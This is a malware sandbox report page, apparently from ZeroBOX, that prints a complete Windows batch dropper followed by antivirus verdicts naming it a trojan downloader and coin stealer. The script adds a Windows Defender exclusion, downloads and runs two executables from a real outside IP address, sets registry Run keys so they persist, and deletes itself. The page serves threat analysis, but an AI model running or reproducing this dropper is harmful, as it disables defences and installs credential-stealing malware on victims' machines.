popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
@echo off
REM Create a directory in C:\RM
powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\RM'"
REM Exclude the C:\RM directory from Windows Defender scans
powershell -Command "Add-MpPreference -ExclusionPath 'C:\RM'"
REM Download the main.exe file to the C:\RM directory
powershell -Command "Invoke-WebRequest 'http://85.209.133.18/LgGFdDAm/AntiVirus.exe' -OutFile 'C:\RM\AntiVirus.exe'"
powershell -Command "Invoke-WebRequest 'http://85.209.133.18/LgGFdDAm/AntiVirus2.exe' -OutFile 'C:\RM\AntiVirus2.exe'"
REM Run the downloaded main.exe file
start "" "C:\RM\AntiVirus.exe"
start "" "C:\RM\AntiVirus2.exe"
REM Add entry to the Windows Registry to run main.exe at startup
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram1" /t REG_SZ /d "C:\RM\AntiVirus.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "MainProgram2" /t REG_SZ /d "C:\RM\AntiVirus2.exe" /f
REM Clean up temporary files (optional)
REM del %TEMP%\lander.vbs
REM Exit the script
(goto) 2>nul & del "%~f0"
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Boxter.i!c
tehtris Clean
Cynet Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Backdoor.zq
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Trojan.Gen.NPE
ESET-NOD32 PowerShell/TrojanDownloader.Agent.GEI
TrendMicro-HouseCall Clean
Avast Other:Malware-gen [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan-PSW.BAT.Coins.gen
BitDefender Heur.BZC.MNT.Boxter.928.27AEDF2A
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.MNT.Boxter.928.27AEDF2A
Tencent Win32.Trojan-Downloader.Downloader.Pjgl
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Heur.BZC.MNT.Boxter.928.27AEDF2A
TrendMicro Clean
FireEye Heur.BZC.MNT.Boxter.928.27AEDF2A
Emsisoft Heur.BZC.MNT.Boxter.928.27AEDF2A (B)
Jiangmin Clean
Avira Clean
MAX malware (ai score=87)
Antiy-AVL Clean
Kingsoft Win32.Troj.Undef.a
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.MNT.Boxter.928.27AEDF2A [many]
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-PSW.BAT.Coins.gen
GData Heur.BZC.MNT.Boxter.928.2856D07C
Varist Clean
AhnLab-V3 Clean
Acronis Clean
ALYac Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Trojan-Downloader.PowerShell.Agent
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Other:Malware-gen [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Trojan[stealer]:Win/Coins.gyf
No IRMA results available.